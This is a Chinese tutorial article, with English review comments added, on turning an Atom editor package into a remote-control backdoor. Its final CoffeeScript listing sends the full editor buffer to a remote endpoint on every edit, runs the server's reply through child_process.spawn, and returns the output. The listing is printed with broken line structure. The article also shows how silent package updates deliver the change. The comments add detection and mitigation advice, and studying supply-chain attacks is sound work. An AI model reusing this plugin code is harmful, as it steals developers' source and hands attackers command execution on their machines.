本文讲的是
“钓鱼”插件实战:看我如何让粗心开发者的编辑器自动变身远控,
在这篇文章中,我们将探讨攻击者如何利用编辑器插件来攻击开发人员。为此,我们将研究Atom插件的工作原理及其安全性。Atom插件在编辑器进程内运行,可以直接调用Node.js模块(如下文用到的child_process),因此安装一个插件就等于信任它的全部代码及其后续更新。
cmd + shift + p Package Generator: Generate Package
# Handler for the package's toggle command as first published: its only
# effect is one line in the developer console.
toggle: ->
  console.log('touch-type-teacher was toggled!')
# First publication of the package, as printed: the listing's line breaks were
# lost, so several git commands share one line. <remote_repo_url> is a
# placeholder for the package's repository.
# NOTE(review): the page shows no review or signing step between the push and
# the publish command; what gets published is presumably whatever the author
# pushed. Confirm against the registry's current publishing rules.
git init git add . git commit -m "First commit" git remote add origin <remote_repo_url> git push -u origin master
apm-beta publish minor
# Updated handler used to test the update path: the original log line plus a
# second marker line, so the author can tell which revision is running.
toggle: ->
  console.log('touch-type-teacher was toggled!')
  console.log('update test')
# Ship the changed handler as a new minor version.
# For a reviewer: the code a user audited at install time is not the code
# that runs after an update, so each published version needs its own diff
# review (compare the package's repository tags between versions).
git commit --all --message 'Add console logging'
git push
apm-beta publish minor
# Add an HTTP client library to the package at an exact pinned version;
# --save records it in package.json, which is where an auditor will see a
# new network-capable dependency appear between two package versions.
# NOTE(review): the `request` package has since been deprecated upstream.
npm install --save request@2.73.0
# Install the package's declared dependencies with Atom's package manager.
apm install
request = require'request '
# Handler after the HTTP client is added: every toggle issues one plain-HTTP
# GET with a fixed test value to the remote endpoint. The callback ignores
# error, response and body and only logs to the developer console.
# What is observable from outside the package: an outbound HTTP request
# originating from the editor process when the command runs.
toggle: ->
  beaconUrl = 'http://my-remote-endpoint.com/run?data=test_data'
  request beaconUrl, (error, response, body) =>
    console.log 'Data sent!'
# Package main module (CoffeeScript). The listing's line breaks and
# indentation were lost in extraction, so the code is kept exactly as printed;
# the nesting of the callbacks cannot be recovered with certainty from here.
#
# activate(state): builds the view and modal panel, stores the text editor
# that is active at activation time in @editor, registers the
# 'touch-type-teacher:toggle' command, and additionally subscribes @myChange
# to that editor's onDidChange event.
# Review point: the onDidChange subscription means myChange is triggered by
# buffer changes, with no command invoked by the user. When auditing a
# package, look for an editor-event subscription like this one, together
# with `require 'child_process'` and outbound requests.
module.exports = TouchTypeTeacher = touchTypeTeacherView: null modalPanel: null subscriptions: null editor: null activate: (state) -> @touchTypeTeacherView = new TouchTypeTeacherView(state.touchTypeTeacherViewState) @modalPanel = atom.workspace.addModalPanel(item: @touchTypeTeacherView.getElement(), visible: false) @editor = atom.workspace.getActiveTextEditor() @subscriptions = new CompositeDisposable @subscriptions.add atom.commands.add 'atom-workspace', 'touch-type-teacher:toggle': => @toggle() @subscriptions.add @editor.onDidChange (change) => @myChange()
# myChange(): appends the full buffer text (@editor.getText()) to a query
# string and sends it over plain HTTP to the remote endpoint; the response
# body is passed to child_process.spawn, and data from the child's stdout is
# sent back to the same host in a second request.
# Impact: file contents open in the editor leave the machine, and the remote
# side chooses what the editor process executes, with the user's privileges.
# Detection: the editor process making outbound HTTP requests while the user
# types, and spawning child processes that no editor feature accounts for.
# Mitigation: review package source and its dependency list at install and at
# every update, and alert on or restrict child processes and outbound
# connections from the editor.
# NOTE(review): 'External code to run:n' looks like an extraction-mangled
# '\n'; left as printed.
myChange: -> request 'http://my-remote-endpoint.com/test?data=' +@editor.getText(), (error, response, body) => {spawn} = require 'child_process' test = spawn body console.log 'External code to run:n' + body test.stdout.on 'data', (data) -> console.log 'sending output' request 'http://my-remote-endpoint.com/run?data=' + data.toString().trim(), (error, response, body) => console.log 'output sent!'
下面是它的一个演示。在左侧,您将看到用户在编辑器中输入内容,右边您将看到我们的远程服务器上的日志。
原文发布时间为:2017年9月5日
本文作者:愣娃
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。